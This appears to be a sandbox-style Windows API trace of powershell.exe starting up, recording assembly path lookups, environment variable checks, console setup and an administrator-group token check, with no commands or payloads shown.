	[0576.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0576.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0576.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0578.310] CoTaskMemAlloc (cb=0x104) returned 0x23bed0
	[0578.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0578.310] CoTaskMemFree (pv=0x23bed0) 
	[0585.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0585.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0588.363] CoTaskMemAlloc (cb=0x104) returned 0x228d70
	[0588.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x228d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.363] CoTaskMemFree (pv=0x228d70) 
	[0588.365] CoTaskMemAlloc (cb=0x104) returned 0x2f92b0
	[0588.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f92b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.366] CoTaskMemFree (pv=0x2f92b0) 
	[0588.399] CoTaskMemAlloc (cb=0x104) returned 0x2f92b0
	[0588.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f92b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.399] CoTaskMemFree (pv=0x2f92b0) 
	[0588.401] CoTaskMemAlloc (cb=0x104) returned 0x2f92b0
	[0588.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f92b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.401] CoTaskMemFree (pv=0x2f92b0) 
	[0588.402] CoTaskMemAlloc (cb=0x104) returned 0x2f92b0
	[0588.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f92b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.402] CoTaskMemFree (pv=0x2f92b0) 
	[0594.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0594.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0594.030] CoTaskMemAlloc (cb=0x104) returned 0x2f92b0
	[0594.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f92b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.031] CoTaskMemFree (pv=0x2f92b0) 
	[0594.034] CoTaskMemAlloc (cb=0x104) returned 0x2f92b0
	[0594.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f92b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.034] CoTaskMemFree (pv=0x2f92b0) 
	[0596.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0596.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0606.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0606.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0609.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0611.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0616.690] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0616.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.690] CoTaskMemFree (pv=0x2f94d0) 
	[0616.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0616.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0616.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0618.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0618.736] SetErrorMode (uMode=0x1) returned 0x1
	[0618.736] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dc40 | out: lpFileInformation=0x16dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0618.736] SetErrorMode (uMode=0x1) returned 0x1
	[0622.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0622.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0622.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0622.344] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0622.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.344] CoTaskMemFree (pv=0x2f94d0) 
	[0622.347] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0622.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.348] CoTaskMemFree (pv=0x2f94d0) 
	[0622.348] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0622.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.348] CoTaskMemFree (pv=0x2f94d0) 
	[0622.351] CoCreateGuid (in: pguid=0x16e008 | out: pguid=0x16e008*(Data1=0x61d422df, Data2=0x71a9, Data3=0x47ee, Data4=([0]=0x88, [1]=0xa0, [2]=0x7e, [3]=0x91, [4]=0xf5, [5]=0xf9, [6]=0x36, [7]=0xe1))) returned 0x0
	[0622.355] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0622.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.355] CoTaskMemFree (pv=0x2f94d0) 
	[0622.358] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0622.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.358] CoTaskMemFree (pv=0x2f94d0) 
	[0622.360] CoTaskMemAlloc (cb=0x104) returned 0x2f94d0
	[0622.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f94d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.361] CoTaskMemFree (pv=0x2f94d0) 
	[0622.371] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0623.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16dcb0 | out: lpConsoleScreenBufferInfo=0x16dcb0) returned 1
	[0623.298] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0623.299] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dcb0 | out: lpConsoleScreenBufferInfo=0x16dcb0) returned 1
	[0623.302] GetCurrentProcess () returned 0xffffffffffffffff
	[0623.303] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16dcd8 | out: TokenHandle=0x16dcd8*=0x314) returned 1
	[0623.305] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dbf8 | out: TokenInformation=0x0, ReturnLength=0x16dbf8) returned 0
	[0623.306] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x257290
	[0623.306] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x257290, TokenInformationLength=0x4, ReturnLength=0x16dbf8 | out: TokenInformation=0x257290, ReturnLength=0x16dbf8) returned 1
	[0623.308] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16dd58 | out: phNewToken=0x16dd58*=0x1bc) returned 1
	[0623.308] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dbf8 | out: TokenInformation=0x0, ReturnLength=0x16dbf8) returned 0
	[0623.308] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2572c0
	[0623.308] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x2572c0, TokenInformationLength=0x4, ReturnLength=0x16dbf8 | out: TokenInformation=0x2572c0, ReturnLength=0x16dbf8) returned 1
	[0623.309] CheckTokenMembership (in: TokenHandle=0x1bc, SidToCheck=0x2dffd68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16dd68 | out: IsMember=0x16dd68) returned 1
	[0623.310] CloseHandle (hObject=0x1bc) returned 1
	[0623.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0623.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0623.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0623.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0623.331] CoTaskMemAlloc (cb=0x804) returned 0x1b8c9880
	[0623.331] GetConsoleTitleW (in: lpConsoleTitle=0x1b8c9880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0623.332] CoTaskMemFree (pv=0x1b8c9880) 
	[0624.363] CoTaskMemAlloc (cb=0x804) returned 0x1b8ca130
	[0624.363] GetConsoleTitleW (in: lpConsoleTitle=0x1b8ca130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0624.363] CoTaskMemFree (pv=0x1b8ca130) 
	[0624.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.366] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0625.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
